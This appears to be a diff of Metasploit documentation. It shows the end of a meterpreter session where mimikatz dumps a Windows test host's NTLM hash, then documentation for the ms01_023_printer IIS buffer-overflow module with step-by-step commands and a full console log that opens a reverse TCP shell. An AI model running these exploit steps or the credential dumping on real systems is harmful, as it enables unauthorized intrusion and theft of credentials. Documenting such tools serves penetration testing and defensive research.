+  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
+ .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
+ '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
+  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
+
+Success.
+meterpreter > creds_all
+[+] Running as SYSTEM
+[*] Retrieving all credentials
+msv credentials
+===============
+
+Username  Domain      NTLM                              SHA1
+--------  ------      ----                              ----
+admin     WIN11-TEST  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8
+
+wdigest credentials
+===================
+
+Username     Domain      Password
+--------     ------      --------
+(null)       (null)      (null)
+WIN11-TEST$  WORKGROUP   (null)
+admin        WIN11-TEST  (null)
+
+kerberos credentials
+====================
+
+Username     Domain      Password
+--------     ------      --------
+(null)       (null)      (null)
+admin        WIN11-TEST  (null)
+win11-test$  WORKGROUP   (null)
+
+
+meterpreter > 
+```
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+This exploits a buffer overflow in the request processor of the
+Internet Printing Protocol ISAPI module in IIS. This module
+works against Windows 2000 Server and Professional SP0-SP1.
+
+If the service stops responding after a successful compromise,
+run the exploit a couple more times to completely kill the
+hung process.
+
+This module has been tested successfully on:
+
+* Windows 2000 Professional SP0 (Dutch)
+* Windows 2000 Professional SP0 (Finnish)
+* Windows 2000 Professional SP0 (Greek)
+* Windows 2000 Professional SP0 (Korean)
+* Windows 2000 Professional SP0 (Turkish)
+* Windows 2000 Professional SP1 (Arabic)
+* Windows 2000 Professional SP1 (Czech)
+* Windows 2000 Professional SP1 (English)
+* Windows 2000 Professional SP1 (Greek)
+* Windows 2000 Server SP0 (Chinese)
+* Windows 2000 Server SP0 (Dutch)
+* Windows 2000 Server SP0 (English)
+* Windows 2000 Server SP0 (German)
+* Windows 2000 Server SP0 (Hungarian)
+* Windows 2000 Server SP0 (Italian)
+* Windows 2000 Server SP0 (Portuguese)
+* Windows 2000 Server SP0 (Spanish)
+* Windows 2000 Server SP0 (Turkish)
+* Windows 2000 Server SP1 (English)
+* Windows 2000 Server SP1 (French)
+* Windows 2000 Server SP1 (Swedish)
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms01_023_printer`
+1. `set RHOSTS [IP]`
+1. `show targets` to see the possible targets
+1. `set TARGET [TARGET]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+
+## Scenarios
+
+### Windows 2000 Professional SP1 (EN)
+
+```
+msf6 > use exploit/windows/iis/ms01_023_printer
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_023_printer) > set rhosts 192.168.200.195
+rhosts => 192.168.200.195
+msf6 exploit(windows/iis/ms01_023_printer) > check
+[*] 192.168.200.195:80 - The target appears to be vulnerable.
+msf6 exploit(windows/iis/ms01_023_printer) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Windows 2000 SP0-SP1 (Arabic)
+   1   Windows 2000 SP0-SP1 (Czech)
+   2   Windows 2000 SP0-SP1 (Chinese)
+   3   Windows 2000 SP0-SP1 (Dutch)
+   4   Windows 2000 SP0-SP1 (English)
+   5   Windows 2000 SP0-SP1 (French)
+   6   Windows 2000 SP0-SP1 (Finnish)
+   7   Windows 2000 SP0-SP1 (German)
+   8   Windows 2000 SP0-SP1 (Korean)
+   9   Windows 2000 SP0-SP1 (Hungarian)
+   10  Windows 2000 SP0-SP1 (Italian)
+   11  Windows 2000 SP0-SP1 (Portuguese)
+   12  Windows 2000 SP0-SP1 (Spanish)
+   13  Windows 2000 SP0-SP1 (Swedish)
+   14  Windows 2000 SP0-SP1 (Turkish)
+   15  Windows 2000 Pro SP0 (Greek)
+   16  Windows 2000 Pro SP1 (Greek)
+
+
+msf6 exploit(windows/iis/ms01_023_printer) > set target 4
+target => 4
+msf6 exploit(windows/iis/ms01_023_printer) > set payload windows/shell/reverse_tcp
+payload => windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_023_printer) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms01_023_printer) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Using target: Windows 2000 SP0-SP1 (English) ...
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.195
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1168) at 2022-07-08 11:07:42 -0400
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+
+
+C:\WINNT\system32>ver
+ver
+
+Microsoft Windows 2000 [Version 5.00.2195]
+```
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1,2 @@`
				`$someText = "Hello!" ; $someText > "C:\flag.txt"`